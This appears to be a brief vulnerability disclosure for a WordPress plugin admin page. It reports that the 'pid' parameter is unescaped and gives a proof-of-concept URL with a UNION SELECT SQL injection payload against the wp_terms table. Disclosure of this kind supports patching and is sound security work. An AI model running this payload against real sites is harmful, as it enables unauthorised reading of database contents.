$_POST[ ‘pid’ ] is not escaped. Url is accessible for administrator user. Url with problem: http://localhost:1406/wp/wp-admin/admin.php?page=fssc-products&fp;=general&f;=edit&cid;=0&pid;=0
http://target/wp-admin/admin.php?page=fssc-products&fp=general&f=edit&cid=0&pid=0+UNION+SELECT+name+FROM+wp_terms+WHERE+term_id=1